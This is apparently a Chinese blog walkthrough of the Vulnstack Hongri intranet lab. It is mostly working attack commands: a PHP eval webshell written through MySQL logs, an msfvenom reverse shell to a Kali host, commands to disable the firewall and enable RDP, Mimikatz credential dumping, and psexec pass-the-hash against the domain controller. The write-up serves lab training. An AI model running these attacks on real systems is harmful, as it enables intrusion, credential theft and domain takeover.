Vulnstack 红日安全内网靶场[一]

<1> 环境搭建

靶场下载链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
虚拟机所有统一密码:hongrisec@2019(有的会提示密码已过期,随便改改 我改成了Hongrisec@2019)
网络拓扑图如下:

这里我设置的网络是VMnet3和VMnet8,其实无所谓设置哪两个网络,最重要的是需要两个网络,且不能在同一个网段内(因为需要一个做外网一个做内网)

ip配置如下:

kali (攻击机):192.168.236.128 (VMnet8 网卡分配的IP)
Windows 7 (web服务器):192.168.236.132(外网和kali连通)、192.168.52.143(内网ip)
Windows 2008 (域控):192.168.52.138
Win2k3 (域管):192.168.22.

【注意】实际上域环境三台虚拟机的 IP 初始状态就已经被配置为固定的 192.168.52.XXX/24网段(同时已配置好域控 IP 必定为 192.168.52.138),故 我们要设置的内网网卡 即 VMware 的 VMnet3 网卡应注意也配置为 192.168.52.XXX/24 网段 (把VMnet3改成其他的也可以,但是那样还需要自己去网络里修改一下被配置的固定192.168.52.XXX/24网段 麻烦一点,就用52吧)

(1) 配置Win7 web服务器网络

从网络拓扑图得知,需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,故需要配置两个网络适配器(网卡),点击添加网络设配器:

右键右下角电脑图标 -> 打开网络和共享中心 -> 更改适配器设置 -> 右键网络本地连接(点属性) -> 选Internet 协议版本 4(TCP/ipv4) 即可设置IP地址为 192.168.236.132

能ping 通kali机,说明和外网已经连通了,这里还有一点就是记得把WIndows 7这个web服务器防火墙的关闭,否则kali会ping 不通

同理 内网ip设置为:

ping一下DC机,域内网络也配置正常

在 Win7 外网服务器主机的 C 盘找到 PhpStudy 启动 Web 服务(模拟外网 Web 站点):

开启之后,我们在我们的主机 访问一下win7,可以正常访问到PHP探针

这样我们的环境就相当于是配置好啦

(2) 配置 Winserver 2008网络(DC域控)

hongrisec@2019 登录的时候,显示密码过期 自己改成了 Hongrisec@2019

Win2008 DC域控主机ip为 192.168.52.138 默认配好了的

(3) 配置 Win2003/win2k3网络(域成员)

域内主机 win2003 ip为192.168.236.141 与外网不连通

<2> 外网边界突破

(1) 信息收集(弱口令+开放了phpmyadmin、yxcms)

在外网站点看见了一个MySQL 连接检测:

检测一下,存在弱口令 root:root 连接正常 但单从这只能检测,还利用不了呢
扫一下目录,看看有什么东西。扫描到了 phpmyadmin

访问/phpmyadmin 使用 刚刚检测到的 root:root 登录一下,成功登录进去了

phpmyadmin是一个以 PHP 为基础,以 Web-Base 方式架构在网站主机上的 MySQL 的数据库管理工具,让管理者可用 Web 接口管理 MySQL 数据库

在里面看见了mysql数据库和一个 yxcms的数据库,应该也存在一个yxcms服务

(2) PhpMyAdmin 后台 Getshell

phpmyadmin有两种getshell方式:

  • into outfile导出木马
  • 利用Mysql日志文件getshell

我们挨个试一下。

-尝试into outfile导出木马(失败)

执行 select @@basedir; 查看一下网站的路径

路径为:C:/phpStudy/MySQL/

再执行 select '<?php eval($_POST[cmd]);?>' into outfile 'C:/phpStudy/www/hack.php'; 直接将木马写入到 www网站根目录下 失败

这是因为 Mysql新特性secure_file_priv会对读写文件产生影响,该参数用来限制导入导出。我们可以借助show global variables like '%secure%';命令来查看该参数

当secure_file_priv为NULL时,表示限制Mysql不允许导入导出,这里为NULL。所以into outfile写入木马出错。要想使得该语句导出成功,则需要在Mysql文件夹下修改my.ini 文件,在[mysqld]内加入secure_file_priv =""。

直接写入木马不行,那我们就换另一种方法---Mysql日志文件写入shell

-利用Mysql日志文件写入shell

先执行命令:show variables like '%general%'; 查看日志状态:

当开启 general_log 时,所执行的 SQL 语句都会出现在 stu1.log 文件中。那么如果修改 general_log_file 的值为一个php文件,则所执行的 SQL 语句就会对应生成在对应的文件中,进而可 Getshell

SET GLOBAL general_log='on'
开启 general_log

SET GLOBAL general_log_file='C:/phpStudy/www/hack.php'
指定日志写入到网站根目录的 hack.php 文件

然后接下来执行 SQL 语句:SELECT '<?php eval($_POST["cmd"]);?>',即可将一句话木马写入 hack.php 文件中 访问/hack.php 成功写入

上蚁剑 连上去了

(3)yxcms后台上传getshell

前面我们登录进去之后,可以看到还有一个yxcms的数据库,同时我们进入后台之后,可以看到一个 beifen.rar备份文件和yxcms目录,这道题其实还有一种getshell的方法,这里我们也记录一下。 字典不够强大,没扫出来 beifen.rar和 /yxcms

访问/yxcms,可以看到在公告处,泄露了 yxcms的admin后台登录路径 以及 默认的密码

成功登录到后台

xxcms,既然后台都登录到了,那拿shell还不简单吗,一般就是找一找模板编辑的地方,写入一句话🐎,或者写入日志,这里刚好就有编辑模板的地方,我们新增一个shell.php

建立是建立了,shell.php 生成到哪了呢?? 这里就需要我们前面提到的 beifen.rar 备份文件了,我们把备份文件解压,在里面寻找模板的这么多php 都存放在了:/yxcms/protected/apps/default/view/default/
因此我们的shell.php 就生成在了这里

蚁剑连接 拿到shell

<3> 内网信息探测

我们在拿到的shell 执行 whoami 发现是administrator权限 在域中
ifconfig 发现了内网网段 192.168.52.0/24

(1) 靶机上线CS

在kali里 ./teamserver 192.168.236.128 cs123456 运行cs服务

主机运行CS 客户端并连接 CS 服务端,配置好listener监听器之后,生成 exe后门程序

利用蚁剑 把生成的artifact.exe 上传到靶机上:

在终端里执行 artifact.exe 可以看到靶机上线到CS上

可使用 Mimikatz 直接抓取本机用户密码:

这里抓取到密码之后,我们执行 net view 发现了域内另外俩台机器点击这里可以看到

可以利用抓取到的密码 psexec取login一下 监听器选 windows_smb/bind_pipe

拿到正向会话(前面三层内网靶机有讲正向反向)之后,我们可以右键 目标->文件管理

可以看到域控的文件 我们可以进行上传文件操作,算是打通了 这是CS可以用到的一点。这里能拿到是因为我们域控的密码和win7、密码设置一样了。刚好可以拿下 我们下面再看看其他方法 横向移动拿到域控和域内其他机器

(2) 域内信息收集

内网信息收集的主要目的就是查找域控以及域内的其他主机

net view                 # 查看局域网内其他主机名
net config Workstation   # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user                 # 查看本机用户列表
net user /domain         # 查看域用户
net localgroup administrators # 查看本地管理员组(通常会有域用户)
net view /domain         # 查看有几个域
net user 用户名 /domain   # 获取指定域用户的信息
net group /domain        # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain    # 查看域中某工作组
net group "domain admins" /domain  # 查看域管理员的名字
net group "domain computers" /domain  # 查看域中的其他主机名
net group "doamin controllers" /domain  # 查看域控制器主机名(可能有多台)

1、先判断是否存在域,使用 ipconfig /all 查看 DNS 服务器,发现主 DNS 后缀不为空,存在域god.org

也可以执行命令net config workstation 来查看当前计算机名、全名、用户名、系统版本、工作站、域、登录域等全面的信息

2、上面发现 DNS 服务器名为 god.org,当前登录域为 GOD 再执行net view /domain查看有几个域(可能有多个)

3、查看域的组账户信息(工作组)

4、既然只有一个域,那就利用 net group "domain controllers" /domain 命令查看域控制器主机名,直接确认域控主机的名称为 OWA

5、确认域控主机的名称为 OWA 再执行 net view 查看局域网内其他主机信息(主机名称、IP地址)

扫描出来 除了域控OWA 之外,还有一台主机ROOT-TVI862UBEH

至此内网域信息收集完毕,已知信息:域控主机:192.168.52.138,同时还存在一台域成员主机:192.168.52.141,接下来的目标就是横向渗透拿下域控

(3) rdp远程登陆win7

Win7跳板机 默认是不开启3389的,同时还有防火墙

#注册表开启3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

#添加防火墙规则
netsh advfirewall firewall add rule name="Open 3389" dir=in action=allow protocol=TCP localport=3389

#关闭防火墙
netsh firewall set opmode disable   			#winsows server 2003 之前
netsh advfirewall set allprofiles state off 	#winsows server 2003 之后

这里我们以域用户 administrator登录。

输入我们刚从CS上 mimikatz dump下来的密码Hongrisec@2019 (也可以自己 net user创建一个用户 加入到administrator组里 用那个账户登录)

成功连接

如果MSF 中有Win7 的 Shell,只需要返回会话并执行命令run post/windows/manage/enable_rdp即可开启靶机的远程桌面

<4> 内网渗透

(1)CS派生会话给MSF

1、MSF开启监听

msfconsole # 启动MSF框架
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.236.128
set lport 1111
exploit 

2、CS派生会话

案例 choose之后,我们的msf那边就可以收到一个session会话(但是没有)

CS执行失败,这里我们换一种方法 采用质朴的方法反弹 win7的shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.236.128  LPORT=1111 -f exe -o shell.exe #kali里生成msf后门文件 shell.exe
蚁剑上传到 win7上 
kali里运行监听
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.236.128
set lport 1111
exploit 

蚁剑运行 shell.exe 得到meterpreter

3、MSF 简单利用

获得 MSF 的会话后即可使用 MSF 集成的诸多强大功能模块和脚本。简单演示下,如调用post/windows/gather/checkvm判断靶机是否属于虚拟机(检查是否进入了蜜罐):

再如调用 post/windows/gather/enum_applications模块枚举列出安装在靶机上的应用程序:

4、添加路由

# 可以用模块自动添加路由
run post/multi/manage/autoroute
#添加一条路由
run autoroute -s 192.168.52.0/24
#查看路由添加情况
run autoroute -p

5、内网端口扫描

先执行background 命令将当前执行的 Meterpreter 会话切换到后台(后续也可执行sessions -i 重新返回会话),然后使用 MSF 自带 auxiliary/scanner/portscan/tcp 模块扫描内网域成员主机 192.168.52.141 开放的端口:

use auxiliary/scanner/portscan/tcp
set rhosts 192.168.52.141
set ports 80,135-139,445,3306,3389
run

192.168.52.141 win2003域成员机开启了 135、139、445端口

同理扫描一下域控机子

域控开启了80、135、139、445端口

(2)MSF进行ms17-010攻击(未成功)

1、msf扫描模块探测是否存在ms17-010漏洞

对于开启了 445 端口的 Windows 服务器肯定是要进行一波永恒之蓝扫描尝试的,借助 MSF 自带的漏洞扫描模块进行扫描:

search ms17_010
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.52.141
run

一测 域控和成员机可能都存在ms17-010漏洞
2、漏洞利用

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp #内网环境,需要正向shell连接
set rhosts 192.168.52.138
run

并没有拿到shell,看师傅的博客说好像通过 ms17-010直接拿到shell的情况并不多,成功率不高

(3) 哈希传递攻击(PTH)拿下域控

上面既然通过永恒之蓝漏洞难以获得域控主机的 Shell,那就换一种攻击思路拿下域控吧,下面演示的是通过哈希传递攻击 PTH 拿下域控主机。

【哈希传递攻击】在 kerberos、NTLM 认证过程的关键,首先就是基于用户密码 Hash 的加密,所以在域渗透中,无法破解用户密码 Hash 的情况下,也可以直接利用 Hash 来完成认证,达到攻击的目的,这就是 hash 传递攻击(Pass The Hash,简称 PTH)。如果内网主机的本地管理员账户密码相同,那么可以通过 PTH 远程登录到任意一台主机,操作简单、威力无穷。

在域环境中,利用哈希传递攻击的渗透方式往往是这样的:

  1. 获得一台域主机的权限,Dump 内存获得该主机的用户密码 Hash 值;
  2. 通过哈希传递攻击尝试登录其他主机;
  3. 继续搜集 Hash 并尝试远程登录,直到获得域管理员账户 Hash,登录域控,最终成功控制整个域。

下面使用 Metasploit/CS 来进行本靶场环境的进行 PTH 攻击演示:

1、CS哈希传递攻击利用

前面我们也有提到过,在win7 上线CS时,我们可以右键会话 ->执行 -> Run Mimikatz
直接借助 CS 进行用户哈希凭证窃取

这里抓取到用户哈希凭证之后,我们执行 net view 发现了域内另外俩台机器点击这里可以看到

可以利用抓取到的密码 psexec 利用域管理员账户 Hash login一下 监听器选 windows_smb/bind_pipe

拿到正向会话(前面三层内网靶机有讲正向反向)之后,我们可以右键 目标->文件管理

可以看到域控的文件 我们可以进行上传文件操作,拿下域控

2、MSF哈希传递攻击

run windows/gather/smart_hashdump 来进行hashdump

需要SYSTEM权限,我们直接getsystem 发现可以正常提权
提到SYSTEM权限之后再执行 run windows/gather/smart_hashdump

得到管理员的密码的hash

[+] 	Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] 	liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

但是这个只是用户密码的一个hash值,我们在msf里加载mimikatz模块
ps:ms6中 mimikatz模块已经合并为kiwi模块

load kiwi

creds_all  #列举所有凭据
creds_kerberos  #列举所有kerberos凭据
creds_msv  #列举所有msv凭据
creds_ssp  #列举所有ssp凭据
creds_tspkg  #列举所有tspkg凭据
creds_wdigest  #列举所有wdigest凭据
dcsync  #通过DCSync检索用户帐户信息
dcsync_ntlm  #通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create  #创建黄金票据
kerberos_ticket_list  #列举kerberos票据
kerberos_ticket_purge  #清除kerberos票据
kerberos_ticket_use  #使用kerberos票据
kiwi_cmd  #执行mimikatz的命令,后面接mimikatz.exe的命令
lsa_dump_sam  #dump出lsa的SAM
lsa_dump_secrets  #dump出lsa的密文
password_change  #修改密码
wifi_list  #列出当前用户的wifi配置文件
wifi_list_shared  #列出共享wifi配置文件/编码

抓取一下用户哈希凭证,报错说 mimikatz在x64用不了。。。 不知道怎么解决 卡住了

后面第二天 CS秃然就可以用了(用着用着beacon就又exit了 不知道为啥)

获得 NTLM Hash:4f1a2b2cf1dd79ae22a7f198412d7e51,在 Metasploit 中,经常使用于哈希传递攻击的模块有:

auxiliary/admin/smb/psexec_command   #在目标机器上执行系统命令
exploit/windows/smb/psexec           #用psexec执行系统命令
exploit/windows/smb/psexec_psh       #使用powershell作为payload

以exploit/windows/smb/psexec模块哈希传递攻击 Windows Server 2008 为例:

use exploit/windows/smb/psexec
set rhosts 192.168.52.138
set smbuser administrator
set smbpass 00000000000000000000000000000000:4f1a2b2cf1dd79ae22a7f198412d7e51
set smbdomain god
run

但是 time out...... 没通
CS里通过 PTH psexec成功拿下域控

参考链接:
https://blog.csdn.net/weixin_39190897/article/details/118353886?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522167602673016800182163716%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=167602673016800182163716&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2allsobaiduend~default-2-118353886-null-null.142v73wechat,201v4add_ask,239v1insert_chatgpt&utm_term=%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA&spm=1018.2226.3001.4449

https://bwshen.blog.csdn.net/article/details/118338328

https://blog.csdn.net/qq_38626043/article/details/109388147

posted @ 2023-03-17 10:17  1vxyz  阅读(7254)  评论(0编辑  收藏  举报